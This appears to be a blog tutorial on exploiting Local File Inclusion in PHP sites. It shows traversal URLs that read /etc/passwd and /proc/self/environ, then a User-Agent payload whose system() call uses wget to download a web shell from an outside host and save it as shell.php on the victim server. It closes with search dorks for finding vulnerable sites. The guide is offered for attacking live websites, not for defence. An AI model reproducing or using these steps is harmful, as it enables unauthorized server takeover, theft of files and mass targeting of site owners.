LFI Tutorial

---

Unknown on 23:18

---

             LOCAL FILE INCLUSION (LFI)

  

In the name of my GOD the most Beneficent and the Merciful.

Today I am posting This Local File Inclusion (LFI) Tutorial.

Lets start. 1. Getting RCE with LFI via /proc/self/environ

So first lets try getting etc/passwd to confirm it its directory traversal attack or not.

../ is used to get into upper ( parent ) Directory in *nix

http://www.website.com/index.php?load=../etc/passwd (not worked )

www.Website.com/index.php?load=../../../../../etc/passwd

(worked) !

result :

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.

Checking if proc/self/environ is accessible


  Now lets see if proc/self/environ is
accessible.

We replace etc/passwd with proc/self/environ

www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.


If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.


- Injecting malicious code -

Now let's inject our malicious code in proc/self/environ.


How we can do that?We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent.

Start Tamper Data in Firefox and request the
URL : www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following cod:

<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>


Then submit the request. Our command will be executed
Wopen your shell and will save it as shell.php in the website directorythrough system(),
and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini. >> 5


- Access our shell -

Now lets check if our malicous code was successfully injected.Lets check if the shell is present. www.website.com/shell.php Our shell is there.

Injection was succesfully.

Dorks for finding lfi vulnerable websites :-

inurl:index.php?cat=

inurl:index.php?x=

inurl:index.php?id=

inurl:index.php?page=

inurl:index.php?module=

inurl:index.php?p=

inurl:index.php?action=

inurl:index.php?content=

Thanks for reading. :)

Filled Under:

Tutorials